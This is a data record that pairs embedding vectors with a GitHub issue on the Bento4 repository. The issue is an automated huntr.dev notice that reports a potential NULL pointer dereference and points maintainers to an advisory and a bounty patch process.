0.007811881136149168, -0.018946779891848564, -0.007281315512955189, 0.013257160782814026, -0.005584901664406061, -0.003008865751326084, 0.004548204131424427, 0.018849043175578117, -0.012824330478906631, 0.00916622020304203, 0.018709421157836914, -0.0027069321367889643, -0.02056640014052391, -0.0014852348249405622, -0.01352942455559969, -0.00945244636386633, 0.002947781002148986, -0.017061874270439148, 0.002235705964267254, 0.013159424997866154, 0.0016283479053527117, 0.00011998812260571867, 0.005211411509662867, -0.010464709252119064, -0.0011405416298657656, 0.019812438637018204, -0.022995833307504654, 0.015428290702402592, -0.035492051392793655, -0.02217205986380577, 0.013089613057672977, -0.011735274456441402, 0.017396969720721245, 0.017466779798269272, 0.006694900803267956, 0.005218392703682184, -0.021418098360300064, -0.010262256488204002, -0.00009048195352079347, 0.0016143856337293983, -0.003912921994924545, -0.012391501106321812, 0.00769320223480463, 0.021683381870388985, 0.002759290626272559, 0.01803923211991787, -0.003930374514311552, 0.01267772726714611, 0.005211411509662867, -0.020943380892276764, 0.014004141092300415, -0.010750935412943363, 0.005270751193165779, 0.020398853346705437, -0.02490866184234619, -0.021027155220508575, 0.0148977255448699, -0.016168290749192238, -0.007399994879961014, -0.006939240265637636, -0.020873570814728737, 0.0026144320145249367, -0.010283200070261955, 0.014841875992715359, -0.01622414030134678, -0.015623762272298336, 0.011218671686947346, 0.014799989759922028, 0.011721312068402767, -0.005152071826159954, -0.007525654975324869, 0.0017889138543978333, -0.007183579728007317, 0.008105088956654072, -0.009305842220783234, 0.03708374872803688, 0.012028481811285019, 0.0024486302863806486, 0.0011187256313860416, 0.003933865111321211, 0.01643357425928116, 0.009647917933762074, -0.017536591738462448, 0.014164706692099571, 0.013655085116624832, -0.0021292436867952347, 0.0073371645994484425, 0.013417726382613182, -0.0036336767952889204, 0.01082074735313654, 0.011812067590653896, -0.001562899793498218, -0.013969235122203827, 0.00744886277243495, 0.014192631468176842, 0.011553765274584293, 0.0008870394667610526, 0.0027715074829757214, -0.01208433136343956, -0.0026702811010181904, 0.011595652438700199, -0.002172875916585326, -0.01565168797969818, 0.03663695603609085, 0.006087542977184057, -0.02782677300274372, -0.007413957267999649, 0.00035080165253020823, 0.0010611313628032804, -0.007993390783667564, -0.03482186421751976, 0.005256788805127144, -0.00240674358792603, -0.0010663671419024467, 0.005218392703682184, 0.0077071646228432655, 0.009305842220783234, 0.011700369417667389, -0.008160937577486038, -0.027938470244407654, -0.00428641214966774, -0.012873198837041855, -0.012286784127354622, -0.020901495590806007, -0.0029739602468907833, 0.005256788805127144, -0.02321922965347767, 0.014827914535999298, -0.012342632748186588, -0.009326785802841187, 0.001615258282981813, 0.017131686210632324, -0.00027946324553340673, -0.007036976050585508, 0.007783956825733185, -0.01251716073602438, -0.0034853278193622828, 0.0047087701968848705, 0.005843203514814377, 0.030996205285191536, -0.0007164381677284837, -0.00041624970617704093, 0.00383263872936368, 0.006918297149240971, -0.019323760643601418, -0.0007858131430111825, -0.008244710974395275, -0.009815464727580547, -0.009410559199750423, 0.0037349029444158077, 0.012845274060964584, -0.0015061781741678715, 0.007993390783667564, 0.0026632999069988728, 0.002075140131637454, -0.0040595256723463535, 0.0051625436171889305, 0.025662623345851898, 0.008342446759343147, 0.0013639377430081367, -0.01851394958794117, 0.013983197510242462, 0.020664136856794357, 0.003574337111786008, 0.03739091753959656, -0.006199241150170565, 0.00010220806871075183, 0.00015216675819829106, -0.002467828569933772, -0.0263746976852417, 0.008181881159543991, -0.009668861515820026, 0.008949805051088333, 0.003951318096369505, -0.0014285132056102157, 0.016978101804852486, -0.004363204352557659, -0.01583319716155529, -0.037781860679388046, 0.020315080881118774, -0.0047401855699718, -0.00677867466583848, 0.006701881997287273, 0.016349799931049347, -0.012796405702829361, -0.016712818294763565, -0.0007639970863237977, 0.0010969096329063177, 0.013166406191885471, 0.024978473782539368, 0.0034835825208574533, 0.004499336238950491, -0.0016597629291936755, -0.0014913432532921433, -0.000029233469831524417, -0.013082632794976234, 0.011232634074985981, -0.004206129349768162, -0.009962068870663643, -0.017061874270439148, -0.002090847585350275, -0.00047907984117046, 0.01471621636301279, 0.008321503177285194, 0.0017941496334969997, 0.013710933737456799, -0.019156213849782944, -0.010171501897275448, 0.004848392680287361, 0.0006204476812854409, 0.02514602057635784, -0.006436599418520927, 0.018890930339694023, -0.004265468567609787, 0.017899610102176666, -0.010436785407364368, -0.011609614826738834, -0.013368858955800533, 0.017424892634153366, 0.03892676532268524, 0.0063667879439890385, 0.011169803328812122, 0.01577734760940075, 0.006241127848625183, 0.02589998207986355, -0.0034957993775606155, -0.0037558465264737606, 0.03158261999487877, 0.028594696894288063, 0.01756451651453972, 0.030437715351581573, 0.009585087187588215, -0.004272449761629105, 0.007504711858928204, 0.0037907520309090614, -0.027100736275315285, 0.015763385221362114, 0.003307309001684189, -0.024629415944218636, -0.006192259956151247, -0.0020768854301422834, 0.03370488062500954, 0.002494007581844926, -0.009103389456868172, -0.017369044944643974, -0.005734995938837528, -0.003045516787096858, 0.014618480578064919, -0.0016161309322342277, 0.009424521587789059, -0.0061154672876000404, 0.031359221786260605, -0.014059989713132381, -0.017578478902578354, 0.02729620784521103, -0.007085843943059444, 0.0007395631400868297, 0.012789425440132618, 0.003073441330343485, -0.0003948700032196939, 0.013459613546729088, 0.006206221878528595, -0.009368672966957092, 0.01138621848076582, 0.019993947818875313, -0.005431316792964935, -0.011323388665914536, 0.0035621202550828457, -0.021711304783821106, 0.001900611910969019, 0.021948663517832756, 0.00833546556532383, 0.00015663904196117073, -0.024447906762361526, -0.0017321922350674868, -0.006656504701822996, 0.006729806773364544, -0.008614710532128811, -0.01230772677809, -0.017396969720721245, 0.00937565416097641, -0.007602447643876076, -0.02116677723824978, -0.02577432245016098, 0.014534707181155682, 0.024419981986284256, 0.012349613942205906, -0.004757638089358807, -0.01109999231994152, -0.007672258652746677, 0.009787539951503277, 0.018639609217643738, -0.014702253974974155, -0.00011000729136867449, 0.006583203095942736, -0.03434714674949646, -0.015260743908584118, -0.0010672397911548615, 0.007776975631713867, 0.02490866184234619, 0.04166336730122566, -0.005968863610178232, 0.0012984896311536431, -0.004726223181933165, -0.010569426231086254, 0.009054522030055523, -0.006070089992135763, 0.022912058979272842, 0.022283757105469704, -0.006237637251615524, 0.00450282683596015, 0.007197542116045952, -0.004946128465235233, -0.002637120895087719, -0.033230166882276535, 0.017369044944643974, 0.004237544257193804, -0.00004668628753279336, -0.001053277519531548, -0.017746025696396828, -0.009124333038926125, 0.00906150322407484, -0.01708979904651642, -0.012258859351277351, 0.010436785407364368, -0.01162357721477747, 0.015079234726727009, 0.020817721262574196, -0.0034853278193622828, 0.019477345049381256, -0.004398110322654247, 0.017606401816010475, 0.0025969792623072863, -0.015456215478479862, 0.020482627674937248, -0.0033631580881774426, 0.004782072268426418, -0.002401507692411542, -0.011553765274584293, -0.013724896125495434, 0.009438483975827694, -0.002293300349265337, -0.0014852348249405622, -0.022241871803998947, 0.004471411928534508, 0.003336978843435645, -0.01685244031250477, 0.022688662633299828, 0.009878294542431831, 0.00022230527247302234, 0.011232634074985981, -0.024029038846492767, -0.005968863610178232, 0.00949433259665966, 0.014053009450435638, 0.011860935017466545, -0.01815093122422695, -0.0025777812115848064, -0.001658017747104168, -0.0071032969281077385, 0.029488280415534973, 0.005347543396055698, -0.020692061632871628, 0.00709980633109808, -0.026765640825033188, -0.007274334318935871, 0.017061874270439148, 0.008021315559744835, 0.016028668731451035, 0.0014162962324917316, 0.006342354230582714, 0.0005292567075230181, 0.00389895960688591, 0.02238149382174015, 0.011728293262422085, 0.004310845863074064, -0.012272821739315987, 0.0020611777435988188, 0.0048099965788424015, -0.014464895240962505, -0.012538104318082333, 0.04872826859354973, 0.013354896567761898, 0.02679356560111046, -0.0004838793829549104, 0.007351126987487078, -0.006293486338108778, 0.001375282066874206, -0.007019523531198502, 0.005473203491419554, 0.010485652834177017, -0.005560467950999737, -0.00541037367656827, -0.0034766013268381357, -0.0018587250960990787, -0.00091801822418347, -0.005462732166051865, 0.008028295822441578, -0.002542875474318862, -0.0014014613116160035, 0.0036616011057049036, 0.002127498621121049, -0.00300188479013741, 0.0056791468523442745, 0.0014389848802238703, 0.004268959164619446, 0.01877923123538494, 0.0038640538696199656, -0.012384519912302494, 0.01396225392818451, -0.028566772118210793, 0.02661205641925335, 0.001304598175920546, -0.015679610893130302, 0.015470177866518497, 0.018890930339694023, 0.0137807447463274, 0.005385939497500658, 0.006565750110894442, -0.001219079364091158, 0.0028291018679738045, -0.004384147934615612, 0.005291694309562445, -0.026263000443577766, -0.007316221483051777, 0.016922252252697945, -0.00489027937874198, 0.009473389945924282, 0.008893956430256367, 0.009892256930470467, 0.0067682028748095036, -0.002600469859316945, -0.009955087676644325, 0.00254811136983335, 0.028790168464183807, -0.0063353730365633965, 0.019365645945072174, 0.015121121890842915, -0.001719102612696588, -0.01780187338590622, 0.0036266956012696028, -0.011993576772511005, -0.013585273176431656, -0.006694900803267956, 0.002453866181895137, -0.014381121844053268, -0.00938961561769247, 0.019840363413095474, 0.030996205285191536, -0.02640262246131897, 0.02398715354502201, 0.0002921165432780981, -0.005340562202036381, 0.0026510830502957106, -0.0017801874782890081, -0.004687827080488205, 0.0056302789598703384, -0.005141600035130978, -0.024894699454307556, 0.002507969969883561, -0.0016100225038826466, 0.01104414276778698, -0.0018308005528524518, 0.016210177913308144, -0.01357131078839302, 0.009012634865939617, -0.010555463843047619, 0.0036685822997242212, 0.002944290405139327, -0.007218485698103905, 0.012852255254983902, -0.00015980236639734358, -0.012091312557458878, -0.007309240289032459, -0.00878225825726986, -0.005864146631211042, -0.010660180822014809, -0.02372187003493309, -0.010171501897275448, 0.004590091295540333, 0.007853767834603786, 0.015791309997439384, 0.012426406145095825, -0.018109044060111046, 0.0022636305075138807, 0.006216693669557571, 0.008447163738310337, 0.00825867336243391, -0.012133198790252209, -0.008433201350271702, 0.016084516420960426, 0.007497730664908886, 0.008370371535420418, -0.007776975631713867, -0.007609428837895393, -0.0038884878158569336, 0.010499615222215652, -0.015972819179296494, -0.007714145351201296, 0.01845810003578663, -0.00513461884111166, -0.0019058476900681853, 0.008852069266140461, 0.009326785802841187, 0.013326971791684628, 0.0038535823114216328, 0.018974702805280685, 0.015539988875389099, 0.015623762272298336, -0.0025533472653478384, 0.018527911975979805, -0.002696460345759988, -0.02116677723824978, 0.023372814059257507, 0.008035277016460896, 0.018597722053527832, 0.022479228675365448, -0.024866774678230286, 0.021599607542157173, 0.004373676143586636, 0.00892886146903038, -0.0040595256723463535, 0.046745628118515015, -0.015735460445284843, -0.012684708461165428, -0.008300560526549816, -0.0023840549401938915, -0.00038810702972114086, 0.016391687095165253, -0.00453075161203742, -0.013019802048802376, 0.028678471222519875, 0.01782979816198349, 0.025201868265867233, 0.005057826638221741, -0.012377538718283176, -0.0010794567642733455, -0.001912828884087503, 0.023917341604828835, 0.00267202639952302, 0.009759616106748581, -0.012810368090867996, 0.0016344564501196146, -0.003570846514776349, 0.0191980991512537, 0.011721312068402767, 0.009745653718709946, 0.002696460345759988, -0.02845507487654686, -0.007351126987487078, -0.008949805051088333, -0.005099713336676359, 0.0009668861166574061, 0.008349427953362465, -0.005689618643373251, 0.015763385221362114, 0.0024486302863806486, 0.015665648505091667, -0.013375839218497276, 0.0033788655418902636, 0.010869614779949188, -0.006635561585426331, 0.03484978526830673, -0.0009590323315933347, 0.008181881159543991, 0.01869545876979828, -0.0029338186141103506, -0.005501128267496824, -0.011232634074985981, 0.008377352729439735, 0.0023997623939067125, 0.006359806749969721, -0.02985130064189434, 0.019603004679083824, 0.00938961561769247, -0.020398853346705437, 0.0002777179761324078, 0.031833939254283905, -0.007434900384396315, 0.030633186921477318, -0.001973913749679923, -0.015232819132506847, -0.010290181264281273, -0.0056163170374929905, 0.017662251368165016 ]
6
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
👋 Hello, @barbibulle, @dimitry-ishenko, @haridarshan - a potential medium severity NULL Pointer Dereference vulnerability in your repository has been disclosed to us. #### Next Steps 1️⃣ Visit **https://huntr.dev/bounties/1-other-axiomatic-systems/Bento4** for more advisory information. 2️⃣ **[Sign-up](https://huntr.dev/)** to validate or speak to the researcher for more assistance. 3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid. --- #### Confused or need more help? - Join us on our **[Discord](https://huntr.dev/discord)** and a member of our team will be happy to help! 🤗 - Speak to a member of our team: @JamieSlome --- *This issue was automatically generated by [huntr.dev](https://huntr.dev) - a bug bounty board for securing open source code.*
🚨 Potential NULL Pointer Dereference
https://api.github.com/repos/axiomatic-systems/Bento4/issues/604/comments
3
2021-05-12T06:16:36
2021-10-23T18:25:39Z
https://github.com/axiomatic-systems/Bento4/issues/604
889,706,620
604
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : 🚨 Potential NULL Pointer Dereference Issue date: --- start body --- 👋 Hello, @barbibulle, @dimitry-ishenko, @haridarshan - a potential medium severity NULL Pointer Dereference vulnerability in your repository has been disclosed to us. #### Next Steps 1️⃣ Visit **https://huntr.dev/bounties/1-other-axiomatic-systems/Bento4** for more advisory information. 2️⃣ **[Sign-up](https://huntr.dev/)** to validate or speak to the researcher for more assistance. 3️⃣ Propose a patch or outsource it to our community - whoever fixes it gets paid. --- #### Confused or need more help? - Join us on our **[Discord](https://huntr.dev/discord)** and a member of our team will be happy to help! 🤗 - Speak to a member of our team: @JamieSlome --- *This issue was automatically generated by [huntr.dev](https://huntr.dev) - a bug bounty board for securing open source code.* --- end body ---
975
[ -0.02361927181482315, 0.007048180792480707, -0.0023327674716711044, -0.001646941527724266, 0.04073134809732437, 0.002008558949455619, -0.021639488637447357, 0.04800590127706528, -0.015239724889397621, 0.04309481009840965, -0.0037888288497924805, 0.006990629248321056, 0.013766397722065449, 0.024678224697709084, -0.0038444623351097107, 0.02811598777770996, -0.01694325916469097, -0.005735998973250389, -0.018048254773020744, -0.0018761897226795554, 0.032934993505477905, -0.025169333443045616, 0.0035720502492040396, 0.031277503818273544, -0.014257507398724556, -0.001837821793742478, -0.0071786316111683846, -0.0011299343314021826, -0.013505496084690094, 0.013144838623702526, 0.006311517674475908, 0.0219157375395298, -0.007500921841710806, -0.0031845346093177795, 0.06089751049876213, 0.0023653802927583456, 0.040056075900793076, 0.032198332250118256, 0.00397107657045126, 0.03041806071996689, -0.009001106023788452, -0.07581494748592377, -0.018784917891025543, -0.012676750309765339, -0.007052017841488123, 0.005152807105332613, 0.01903047226369381, 0.007888437248766422, -0.01671305112540722, 0.010635578073561192, 0.01737297885119915, -0.015615730546414852, -0.011448977515101433, -0.06138861924409866, 0.014610491693019867, -0.030049730092287064, 0.0045465948060154915, 0.02116372622549534, 0.008049583062529564, 0.026258982717990875, -0.015700139105319977, 0.031983472406864166, 0.023987602442502975, 0.02461683750152588, 0.028453625738620758, 0.04567313194274902, -0.012469563633203506, 0.014157750643789768, -0.022452887147665024, 0.03373304754495621, 0.006890872493386269, -0.015377849340438843, -0.013290636241436005, 0.04573452100157738, 0.008985759690403938, -0.01973644085228443, 0.029282372444868088, 0.02785508707165718, -0.00984519999474287, 0.023465799167752266, -0.02496982179582119, 0.012738138437271118, -0.02968139760196209, -0.008486976847052574, 0.012085884809494019, 0.011732899583876133, -0.047729652374982834, -0.07501689344644547, -0.0224835816770792, -0.01597638800740242, 0.013282963074743748, -0.010612557642161846, 0.006276986561715603, -0.01466420665383339, 0.02754814364016056, 0.009653360582888126, -0.01567711867392063, -0.040884822607040405, -0.03941149264574051, -0.013881501741707325, -0.022422192618250847, -0.02139393426477909, 0.023757396265864372, 0.016221942380070686, 0.013083449564874172, 0.0061158412136137486, -0.0007822252810001373, -0.01333667803555727, 0.012584666721522808, 0.11307784169912338, 0.04030162841081619, -0.007577657699584961, -0.024217810481786728, -0.016053123399615288, -0.006042942404747009, 0.028668485581874847, -0.011901718564331532, -0.04113037511706352, -0.03462318331003189, -0.024770308285951614, -0.0002242123446194455, -0.0430334210395813, -0.01711207814514637, 0.02615155279636383, -0.01824776642024517, 0.02256031706929207, -0.031799305230379105, 0.019889913499355316, -0.03723219782114029, 0.012960672378540039, -0.02819272316992283, -0.025000516325235367, -0.007385818287730217, -0.020273592323064804, -0.027701614424586296, 0.018662139773368835, 0.026258982717990875, 0.049878254532814026, 0.004918763414025307, 0.00814166571944952, -0.058380577713251114, -0.004443001467734575, 0.025568360462784767, 0.009967977181077003, -0.026397107169032097, -0.013896849006414413, -0.026826826855540276, -0.00488806888461113, -0.03787677735090256, -0.032413192093372345, 0.006453478708863258, -0.017480408772826195, 0.024202464148402214, 0.022882608696818352, 0.06648387759923935, -0.012523278594017029, 0.008210727944970131, 0.04680882394313812, -0.01789478212594986, 0.012116579338908195, 0.014840698800981045, -0.016513539478182793, 0.02213059738278389, -0.03453109785914421, -0.015262745320796967, -0.02920563519001007, 0.012139599770307541, 0.004654024727642536, -0.03827580437064171, 0.028100641444325447, -0.003704419592395425, -0.016912564635276794, -0.009684055112302303, 0.0034454362466931343, -0.04082343354821205, -0.0185086689889431, -0.024340588599443436, 0.016206596046686172, -0.009031800553202629, -0.0551883690059185, -0.029543273150920868, 0.015899652615189552, 0.00045609826338477433, -0.0059738801792263985, 0.004926436580717564, -0.013528517447412014, 0.05377643182873726, -0.03628067299723625, 0.02466287836432457, 0.00644964212551713, -0.014679553918540478, 0.0013217737432569265, 0.005237216595560312, 0.008709510788321495, 0.023649966344237328, -0.022713789716362953, -0.045550357550382614, -0.03919663280248642, 0.023082120344042778, 0.0036890723276883364, 0.026611967012286186, -0.03074035234749317, 0.003491477807983756, 0.000799011264462024, -0.02632037177681923, -0.005862613208591938, -0.02033497951924801, 0.03146166726946831, 0.00940780621021986, -0.00962266605347395, -0.0004266029573045671, -0.02317420393228531, 0.03523706644773483, 0.019460191950201988, -0.001767800422385335, 0.00529476860538125, -0.03244388476014137, 0.0016277576796710491, -0.020503798499703407, -0.004730760585516691, 0.02842293120920658, -0.0033610269892960787, 0.02170087769627571, -0.009568951092660427, -0.04343244805932045, 0.0029332248959690332, 0.008939717896282673, 0.02584460936486721, 0.004554268438369036, 0.005026193335652351, 0.006572419311851263, 0.010842764750123024, -0.013543864712119102, -0.026857521384954453, -0.008932043798267841, -0.02653523162007332, 0.0021677855402231216, -0.02033497951924801, -0.02186969667673111, 0.004842027556151152, -0.00850999727845192, 0.029006123542785645, -0.028745220974087715, 0.0226524006575346, 0.011448977515101433, 0.06243222579360008, -0.035728175193071365, -0.015569688752293587, -0.019567621871829033, 0.022775178775191307, -0.011909392662346363, -0.0036257654428482056, 0.033978600054979324, 0.0030329814180731773, -0.019368110224604607, -0.01220098789781332, 0.011149708181619644, 0.04134523496031761, -0.02186969667673111, -0.02745606005191803, 0.01829380914568901, -0.03305777162313461, -0.007259204518049955, 0.002618608297780156, 0.0026070978492498398, -0.005977716762572527, -0.009591971524059772, -0.020058732479810715, -0.023757396265864372, -0.046440489590168, 0.04944853484630585, -0.021240463480353355, -0.008801593445241451, -0.025691136717796326, -0.0172041617333889, 0.005831919144839048, 0.03287360444664955, 0.025046557188034058, -0.020350327715277672, 0.00035058657522313297, -0.02170087769627571, 0.011794288642704487, 0.0009520032326690853, 0.006161882542073727, 0.03152305632829666, 0.00814166571944952, 0.010873459279537201, 0.00026305983192287385, -0.02392621524631977, 0.015147642232477665, 0.0034799673594534397, 0.038429275155067444, -0.08029631525278091, -0.01860075257718563, 0.01108831912279129, -0.005133623257279396, -0.010205858387053013, 0.016789788380265236, -0.05221102014183998, 0.006131188478320837, -0.024279199540615082, -0.00160185934510082, 0.00000825059487397084, 0.004654024727642536, -0.02754814364016056, -0.0006397844990715384, 0.003176861209794879, 0.023680660873651505, -0.01058186311274767, 0.009377111680805683, 0.03055618517100811, -0.06814137101173401, -0.017265548929572105, -0.039227329194545746, -0.024248505011200905, -0.009990997612476349, -0.014909761026501656, -0.009154577739536762, 0.012530951760709286, 0.025721831247210503, -0.018999777734279633, 0.008064930327236652, -0.046778127551078796, -0.009054821915924549, 0.002493912586942315, -0.03729358687996864, 0.01398893166333437, 0.04938714578747749, -0.05798155069351196, 0.025568360462784767, -0.003004205645993352, -0.008486976847052574, 0.010443738661706448, -0.012484910897910595, -0.012584666721522808, -0.03095521219074726, -0.010121448896825314, 0.007174795027822256, 0.017649227753281593, 0.014641186222434044, -0.017388327047228813, 0.00769276125356555, 0.011694531887769699, -0.013520843349397182, -0.009139230474829674, -0.006161882542073727, 0.011425957083702087, -0.03348749130964279, 0.02653523162007332, 0.011287832632660866, 0.0008853389881551266, 0.023511841893196106, -0.008387220092117786, 0.009507562965154648, 0.03425484895706177, -0.0035778055898845196, -0.018907694146037102, -0.00023608241463080049, 0.017833394929766655, 0.010881133377552032, 0.010390023700892925, -0.03465387597680092, -0.028561055660247803, 0.017081383615732193, 0.003487640991806984, 0.004404633305966854, -0.014955802820622921, 0.010205858387053013, -0.013060429133474827, 0.0027931821532547474, -0.0047192503698170185, 0.021409280598163605, -0.04889603704214096, 0.03225972130894661, 0.003915443085134029, -0.009108536876738071, 0.001355345593765378, 0.035206373780965805, -0.06163417547941208, 0.020672617480158806, -0.023343022912740707, 0.0073819817043840885, 0.0296353567391634, -0.042450230568647385, 0.0324745811522007, 0.017971519380807877, -0.022514276206493378, 0.009192945435643196, -0.020595882087945938, -0.027916474267840385, -0.015147642232477665, 0.06310749799013138, -0.020411716774106026, -0.06556304544210434, 0.0059738801792263985, 0.054021984338760376, -0.009446173906326294, -0.031799305230379105, 0.0009966058423742652, -0.049049507826566696, 0.02906751073896885, -0.019797829911112785, 0.01916859671473503, -0.009553603827953339, 0.038153026252985, 0.03606581315398216, 0.027348630130290985, 0.006587766110897064, 0.011571754701435566, 0.014771636575460434, 0.006042942404747009, -0.009745443239808083, -0.01711207814514637, 0.009799158200621605, 0.022667748853564262, 0.030065076425671577, 0.01588430628180504, 0.030218549072742462, -0.03640345111489296, 0.016482844948768616, 0.007846233434975147, -0.001187486108392477, 0.003006123937666416, 0.03910455107688904, 0.040056075900793076, 0.024831697344779968, -0.029098205268383026, 0.010850438848137856, 0.014249833300709724, -0.0316765271127224, -0.007163284812122583, 0.00794215314090252, -0.00897041242569685, 0.003420497290790081, 0.024325240403413773, -0.0321369431912899, -0.021885043010115623, -0.04656326770782471, -0.02553766593337059, -0.014779310673475266, -0.0018052090890705585, 0.04149870574474335, -0.034162767231464386, 0.010075407102704048, 0.028821956366300583, -0.06181833893060684, -0.018784917891025543, -0.03222902491688728, 0.030709657818078995, -0.013305983506143093, 0.004627167247235775, 0.0030732678715139627, -0.007965173572301865, 0.02239149995148182, -0.02004338428378105, -0.020058732479810715, -0.010620231740176678, 0.005970043130218983, -0.0042588356882333755, -0.004166752565652132, -0.026427801698446274, 0.030095770955085754, -0.002351951552554965, -0.009952629916369915, 0.021025601774454117, -0.013137164525687695, -0.019521581009030342, -0.004496716428548098, 0.019260680302977562, -0.019935954362154007, -0.0016287168255075812, 0.014288200996816158, 0.009760790504515171, 0.016605621203780174, 0.02361927181482315, 0.015592709183692932, -0.01903047226369381, 0.01772596500813961, -0.042051203548908234, -0.0665452629327774, -0.013712682761251926, -0.0064151110127568245, -0.028085293248295784, 0.007539290003478527, 0.008456282317638397, 0.005475097335875034, 0.005647752899676561, 0.013820112682878971, 0.002319338731467724, 0.018585404381155968, 0.01119574997574091, -0.0332726314663887, 0.007332103326916695, -0.027609532698988914, 0.0016344720497727394, -0.0015615730080753565, -0.007604515179991722, -0.004765291698276997, 0.03222902491688728, 0.035421233624219894, 0.008916697464883327, -0.018830958753824234, 0.03950357809662819, -0.027256546542048454, 0.004412306938320398, -0.04591868817806244, -0.032014165073633194, 0.017618533223867416, -0.01302973460406065, -0.01147967204451561, -0.003215228905901313, -0.03400929644703865, 0.012653728947043419, -0.05036936327815056, -0.003458864986896515, -0.040792737156152725, 0.0018608425743877888, -0.009292702190577984, -0.0019721093121916056, 0.017311591655015945, -0.01798686571419239, -0.022253375500440598, -0.0013515088940039277, 0.03034132532775402, 0.004036301746964455, 0.04840492829680443, 0.019015125930309296, -0.006276986561715603, 0.024478713050484657, -0.015730833634734154, 0.0034032317344099283, -0.005122113041579723, 0.006879362277686596, 0.04444536194205284, -0.008264442905783653, 0.02222268097102642, 0.0006105290376581252, 0.016344720497727394, -0.01680513471364975, -0.015301113948225975, -0.018385890871286392, 0.053715042769908905, -0.012116579338908195, -0.010489780455827713, -0.04085412621498108, 0.030187854543328285, 0.020488452166318893, 0.030832434073090553, 0.008126318454742432, -0.023143509402871132, 0.02470891922712326, -0.01886165328323841, 0.008793920278549194, -0.003399394918233156, 0.0030905334278941154, 0.035605400800704956, -0.027747657150030136, 0.03403998911380768, 0.014763963408768177, 0.007044344209134579, 0.010274920612573624, -0.001381243928335607, -0.0071824686601758, -0.02981952205300331, 0.005647752899676561, 0.004761454649269581, -0.005712978541851044, 0.018063601106405258, -0.009883567690849304, 0.003846380626782775, 0.02414107508957386, 0.00732442969456315, 0.025506971403956413, -0.0034511915873736143, 0.0005894266651012003, 0.009522909298539162, -0.00451973732560873, 0.004492879845201969, -0.014034973457455635, -0.00440847035497427, 0.006330701522529125, -0.030786393210291862, -0.008034235797822475, 0.003031063126400113, 0.03225972130894661, -0.0150171909481287, -0.007443370297551155, -0.00669135944917798, 0.013259941712021828, -0.023143509402871132, -0.005106765776872635, 0.0052141956984996796, 0.0037638896610587835, -0.0030579206068068743, -0.001380284782499075, -0.006027595140039921, 0.019091861322522163, 0.012569320388138294, -0.0077349659986793995, -0.02116372622549534, -0.01916859671473503, 0.020411716774106026, -0.014480040408670902, -0.020457757636904716, 0.01576152816414833, 0.027839738875627518, -0.006982955615967512, 0.0027759165968745947, -0.039871908724308014, 0.027394670993089676, -0.01056651584804058, 0.0020373347215354443, 0.06396694481372833, -0.0003071828978136182, 0.012776506133377552, 0.019398804754018784, 0.03683317080140114, -0.003854054259136319, -0.01560805644840002, 0.016482844948768616, 0.03311916068196297, -0.05623197555541992, 0.025982733815908432, -0.013344351202249527, 0.00566310016438365, 0.005444403272122145, 0.0029466538690030575, -0.00011594295938266441, 0.006031431723386049, -0.013820112682878971, -0.056078504770994186, 0.03308846801519394, 0.004600309766829014, -0.013236921280622482, -0.03348749130964279, -0.0034761305432766676, 0.01732693798840046, 0.004489042796194553, 0.010090754367411137, -0.010551169514656067, 0.009584298357367516, 0.008157012984156609, -0.046164240688085556, 0.02300538495182991, -0.019675053656101227, 0.012032169848680496, 0.014763963408768177, -0.002206153469160199, 0.03268944099545479, -0.0008143584127537906, -0.055372536182403564, -0.018324503675103188, 0.03370235115289688, 0.005486608017235994, 0.006810300052165985, -0.022897955030202866, 0.007013649679720402, 0.04733062535524368, 0.0024325239937752485, -0.015086253173649311, -0.013912196271121502, -0.031323544681072235, -0.0005251604598015547, 0.009921935386955738, 0.01457979716360569, -0.0024171769618988037, -0.031492363661527634, 0.005432893056422472, 0.009484541602432728, 0.01383545994758606, 0.027164464816451073, -0.04318689554929733, -0.03207555413246155, 0.0055326493456959724, -0.017741311341524124, -0.004964804742485285, -0.019107207655906677, 0.011341547593474388, -0.02260635979473591, -0.009269681759178638, 0.017449716106057167, -0.037385668605566025, 0.004669371992349625, 0.01184800360351801, -0.00014891536557115614, -0.0013668560422956944, -0.026565926149487495, -0.000050537702918518335, -0.024693572893738747, -0.030678963288664818, 0.021286504343152046, -0.003002287121489644, 0.016360066831111908, 0.02042706310749054, 0.005363830830901861, -0.04521271958947182, 0.04116107150912285, -0.018892347812652588, -0.029359107837080956, -0.012239356525242329, -0.02148601785302162, 0.0011443222174420953, 0.006787279155105352, -0.005106765776872635, 0.01597638800740242, 0.03225972130894661, -0.0078117018565535545, -0.016989300027489662, 0.026550577953457832, -0.03143097460269928, -0.012461889535188675, 0.0024325239937752485, -0.019981995224952698, -0.002259868662804365, -0.0026090163737535477, -0.01119574997574091, 0.012415848672389984, 0.02078004740178585, 0.01147967204451561, 0.005601711571216583, -0.030233895406126976, -0.04103829339146614, -0.013444107957184315, -0.022406846284866333, 0.007838559336960316, -0.003322659060359001, -0.002175459172576666, 0.006802626419812441, 0.017449716106057167, 0.006188740488141775, -0.006906219758093357, -0.020196856930851936, 0.015239724889397621, 0.0027663246728479862, -0.034807346761226654, -0.013635947369039059, 0.0062309447675943375, -0.02182365395128727, 0.0144493468105793, 0.016881870105862617, 0.01580756902694702, -0.014717921614646912, -0.015308787114918232, -0.030586879700422287, -0.021056296303868294, 0.007259204518049955, -0.009837526828050613, -0.01339806616306305, -0.0000683428006595932, 0.013635947369039059, 0.03425484895706177, 0.005912491586059332, 0.002883346751332283, -0.04680882394313812, -0.010980889201164246, -0.004650188144296408, 0.05282490700483322, -0.018355198204517365, 0.0009841363644227386, 0.0018148011295124888, 0.01036700326949358, 0.006276986561715603, 0.01632937230169773, 0.01829380914568901, 0.023327676579356194, -0.013497822917997837, 0.01860075257718563, -0.01829380914568901, 0.03176861256361008, -0.008786246180534363, 0.006963771767914295, -0.02968139760196209, -0.017710616812109947, -0.02610551007091999, 0.01976713538169861, -0.0028660811949521303, 0.006879362277686596, -0.00814166571944952, -0.007512432523071766, 0.00962266605347395, -0.05089116469025612, 0.010781376622617245, -0.0287298746407032, 0.013582232408225536, 0.004769128281623125, 0.0028219581581652164, -0.010113774798810482, -0.01167918462306261, 0.02226872183382511, 0.01933741569519043, -0.014717921614646912, -0.03505290299654007, 0.03370235115289688, -0.0028104477096349, 0.009852873161435127, -0.039012469351291656, 0.007842396385967731, 0.01570781320333481, -0.03195277601480484, -0.017572492361068726, 0.03649553284049034, -0.0021428465843200684, -0.013536190614104271, -0.011165055446326733, 0.0016824319027364254, -0.0010560761438682675, 0.011970780789852142, 0.010773702524602413, 